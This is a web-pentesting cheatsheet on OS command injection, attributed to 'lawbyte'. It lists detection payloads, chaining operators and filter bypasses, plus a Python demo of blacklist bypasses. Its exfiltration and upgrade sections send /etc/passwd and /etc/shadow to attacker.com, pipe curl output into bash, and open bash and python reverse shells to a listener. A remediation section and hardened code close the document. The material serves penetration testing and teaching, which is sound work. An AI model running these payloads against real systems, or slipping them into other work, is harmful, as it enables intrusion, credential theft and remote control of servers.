Web Pentesting

Command Injection Cheatsheet

Mar 20, 2024
2 min read
lawbyte

Command injection occurs when user input is concatenated into a command string that is handed to a system shell. Unlike code injection, the payload does not run inside the application's interpreter: it runs as OS commands with the privileges of the application process. This cheatsheet covers detection, chaining operators, the common filter bypasses, exfiltration and the path from a blind primitive to an interactive shell, with notes on which shell each trick needs.

Detection

Basic injectors

Test all of these in every parameter:

; id
| id
|| id
& id
&& id
` id `
$(id)
\n id # a literal newline byte (0x0a) in the raw request body or header
%0a id # the same newline, URL-encoded

Confirm blind injection with ping (time-based)

; ping -c 5 127.0.0.1 # Unix: -c is the packet count
| ping -n 5 127.0.0.1 # Windows: -n is the packet count
& ping -c 5 attacker.com # Unix: & backgrounds the ping, so no delay; watch for the ICMP on your host instead

Five packets at the default one-second interval delay the response by roughly four to five seconds. Compare against a baseline request (and against -c 1) so a slow server is not mistaken for code execution, and repeat with a different count to confirm the delay scales with it.

DNS callback for blind detection

; nslookup attacker.com
; curl "http://attacker.com/$(id|base64 -w0)" # id's output contains spaces, so encode it and quote the URL
; wget "http://attacker.com/?c=$(id|base64 -w0)"
$(dig +short attacker.com)

Point these at an interactsh or Burp Collaborator host so the DNS and HTTP hits are logged even when the application returns nothing.


OS Command Chaining

Operator        Behavior                                              Works on
;               Run A, then B, regardless of A's result               Unix shells, PowerShell (not cmd.exe)
|               Pipe stdout of A into B                               Both
||              Run B only if A fails                                 Both
&               Unix: background A and run B; cmd.exe: A then B       Both
&&              Run B only if A succeeds                              Both
\n / %0a        Newline as command separator                          Unix
`cmd`           Command substitution                                  Unix
$(cmd)          Command substitution                                  Unix
\r\n / %0d%0a   CRLF as command separator                             Windows cmd

Windows-Specific

& whoami # cmd.exe
| whoami # cmd.exe and PowerShell
; whoami # PowerShell only: cmd.exe does not treat ; as a command separator
%26 whoami # URL-encoded &
& who^ami # ^ is cmd.exe's escape character: the command still runs as whoami but defeats naive keyword matching
cmd /c whoami
powershell -c whoami
powershell.exe -NoP -NonI -Exec Bypass -c "whoami"

Windows environment variables in commands

%COMSPEC% /c whoami
%SystemRoot%\system32\cmd.exe /c whoami

Filter Bypass Techniques

Bypassing space filters

# Use ${IFS} (the shell's field separator, space/tab/newline by default)
cat${IFS}/etc/passwd
cat$IFS/etc/passwd # works because / cannot be part of a variable name, so the name ends at IFS

# Use a literal tab
cat\t/etc/passwd (URL: cat%09/etc/passwd)

# Use brace expansion (bash/zsh; dash does not expand braces)
{cat,/etc/passwd}

# Use a redirect instead of an argument
cat</etc/passwd

Bypassing keyword filters

# Split the command with variables
a=ca;b=t;$a$b /etc/passwd
a=id;$a

# Use wildcards (check with echo first that the glob expands to exactly one binary: /???/??t also matches /bin/cut)
/bin/c?t /etc/passwd
/bin/ca* /etc/passwd
/???/??t /etc/passwd

# Use base64
echo "aWQ=" | base64 -d | bash
$(echo "aWQ=" | base64 -d)

# Reverse the string: rev turns "di" back into "id" and the substitution runs it
$(echo di | rev)

# Hex encoding (bash/zsh printf; dash's printf only understands octal, e.g. '\151\144')
$(printf '\x69\x64') # hex for 'id'

Bypassing blacklisted characters

# Quotes to break string detection (the shell removes them before execution)
'id'
"id"
i""d
i''d

# $() nesting: the inner substitution yields "id", the outer one runs it
echo $($(echo id))

# Unicode lookalikes (rare: only works if the application NFKC-normalises input before the shell call)
ｉｄ # fullwidth i and d
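The reason these bypasses matter is that blacklists operate on the raw string while the shell operates on the string after quote removal, brace expansion and variable expansion. The following is an added example, not code from the original cheatsheet: a hypothetical blacklist (spaces, separators and the word "cat") in front of a vulnerable bash sink, with four of the payloads from the sections above passing the filter and still reading a constructed secret file. It assumes bash is on the PATH and uses a file under the system temp directory as a stand-in for /etc/passwd.

```python
import os
import re
import subprocess
import tempfile

# Hypothetical blacklist a developer might bolt in front of a shell call:
# rejects spaces, the usual separators and the keyword "cat".
BLOCKED = re.compile(r"[ ;&|]|cat")


def naive_filter(user_input: str) -> bool:
    """True when the input survives the blacklist (i.e. would be passed on to the shell)."""
    return BLOCKED.search(user_input) is None


def vulnerable_lookup(user_input: str) -> str:
    """The sink: interpolates the filtered input straight into a bash command line."""
    cmd = f"echo Result for {user_input}"
    return subprocess.run(["bash", "-c", cmd], capture_output=True, text=True).stdout.strip()


def bypass_payloads(path: str) -> list[str]:
    """Payloads from the cheatsheet that read `path` with no space, no separator and no literal 'cat'."""
    return [
        f'$(c""at${{IFS}}{path})',                        # empty quotes split the keyword, ${IFS} replaces the space
        f'$(c\\at<{path})',                                # backslash inside the word, input redirect instead of a space
        f'`{{c"a"t,{path}}}`',                             # brace expansion builds the argv, backticks run it
        f"$($(printf${{IFS}}'\\x63at')${{IFS}}{path})",    # printf rebuilds 'cat' from hex, nested $() runs it
    ]


def demo() -> dict[str, tuple[bool, str]]:
    """Write a constructed 'secret' file, then push every payload through filter and sink.

    Returns {payload: (passed_filter, sink_output)}.
    """
    # Fixed name (no random characters) so the path itself can never trip the blacklist.
    path = os.path.join(tempfile.gettempdir(), "ci_demo_secret")
    with open(path, "w") as fh:
        fh.write("SECRET-TOKEN-42\n")  # constructed sample data standing in for /etc/passwd
    try:
        return {p: (naive_filter(p), vulnerable_lookup(p)) for p in bypass_payloads(path)}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for payload, (passed, out) in demo().items():
        print(f"{'PASSED' if passed else 'BLOCKED'}  {payload!r} -> {out!r}")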

Exfiltration Techniques

HTTP exfiltration

curl "http://attacker.com/$(id|base64 -w0)" # -w0 is GNU base64; on BSD/macOS pipe through tr -d '\n' instead
wget "http://attacker.com/?data=$(cat /etc/passwd | base64 -w0)"
fetch "http://attacker.com/?d=$(whoami)" # BSD systems; keep the substituted value a single token or quote the URL

DNS exfiltration

# Split long output across DNS labels (63 characters max per label).
# Caveat: base64 output contains / + = which are not legal hostname characters and some resolvers refuse to send them;
# a hex (xxd -p) or base32 alphabet is safer.
for i in $(cat /etc/passwd | base64 -w 30); do
nslookup $i.attacker.com;
done

# One-liner (first 50 characters only)
nslookup $(cat /etc/shadow | base64 | head -c 50).attacker.com

File write (reverse shell)

; echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" > /tmp/r.sh && bash /tmp/r.sh # /dev/tcp exists only in bash, hence the explicit bash
; curl http://attacker.com/shell.sh | bash
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh"])'

Context-Specific Injection

In ping/nslookup wrappers

127.0.0.1; id
127.0.0.1 | id
127.0.0.1`id`

In email fields

test@email.com; id
"test@email.com"; id
test+$(id)@email.com

In filename processing (ImageMagick, ffmpeg, etc.)

file.jpg; id # the trailing # comments out whatever the wrapper appends after the filename
file.jpg | id

In curl/wget URL parameters

http://attacker.com/`id`
http://attacker.com/$(id)

Blind to Interactive — Upgrade Path

# Step 1: Confirm RCE via DNS (no output needed; the substituted value must be a single hostname-safe label)
; nslookup $(whoami).attacker.com

# Step 2: Exfil /etc/passwd via HTTP
; curl http://attacker.com/?f=$(cat /etc/passwd | base64 -w0)

# Step 3: Write reverse shell
; echo "bash -i >& /dev/tcp/attacker.com/4444 0>&1" | bash

# Step 4: Catch on attacker
nc -lvnp 4444

Remediation

  • Never pass user input to shell execution functions (system(), exec(), popen(), subprocess.call(shell=True)); on Windows that includes anything that ends up in cmd /c or powershell -c.
  • Use parameterized system calls: subprocess.run(["ping", host]) instead of subprocess.run(f"ping {host}", shell=True). No shell ever sees the value, so ; | & and $() become literal bytes of one argument.
  • Validate input strictly against an allowlist (for a ping wrapper: an IP literal or a hostname pattern). This also blocks argument injection, where a value beginning with - would be parsed as an option by the tool itself.
  • Escaping (shlex.quote) is a last resort for a shell you cannot remove, not a substitute for the argv form.
  • Run the application with least privilege: limit what a successful injection can do.
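The remediation points above, as an added example that is not part of the original cheatsheet: the vulnerable shell=True wrapper next to the argv form and the argv form with allowlist validation. So that it runs anywhere, the `tool` parameter defaults to `echo` as a stand-in for `ping` (same `-c 1 <host>` argument shape); `validate_host` and the hostname pattern are this example's own.

```python
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: dot-separated labels of letters, digits and inner hyphens, 253 chars max.
# Labels cannot begin with '-', so a value that passes can never be parsed as an option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$",
    re.IGNORECASE,
)


def validate_host(host: str) -> bool:
    """Allowlist check: an IPv4/IPv6 literal or a syntactically valid hostname, nothing else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(host) is not None


def vulnerable_ping(host: str, tool: str = "echo") -> str:
    """Vulnerable: shell=True hands the string to /bin/sh, so ; | & $() inside host are executed."""
    r = subprocess.run(f"{tool} -c 1 {host}", shell=True, capture_output=True, text=True)
    return r.stdout


def argv_only_ping(host: str, tool: str = "echo") -> str:
    """Better: argv list, no shell. Metacharacters are just bytes of the last argument."""
    r = subprocess.run([tool, "-c", "1", host], capture_output=True, text=True)
    return r.stdout


def hardened_ping(host: str, tool: str = "echo") -> str:
    """Argv list plus allowlist validation, which also stops argument injection ('-c', '--help')."""
    if not validate_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return argv_only_ping(host, tool)


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print("shell=True :", repr(vulnerable_ping(payload)))   # second line INJECTED: the payload ran
    print("argv       :", repr(argv_only_ping(payload)))    # one line: the payload is inert text
    try:
        hardened_ping(payload)
    except ValueError as e:
        print("hardened   :", e)
    print("hardened   :", repr(hardened_ping("example.com")))
```

The argv form alone already defeats every operator in the chaining table; the validation step is what closes the remaining hole, where a tool's own option parser turns a leading `-` into behaviour the developer never intended.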
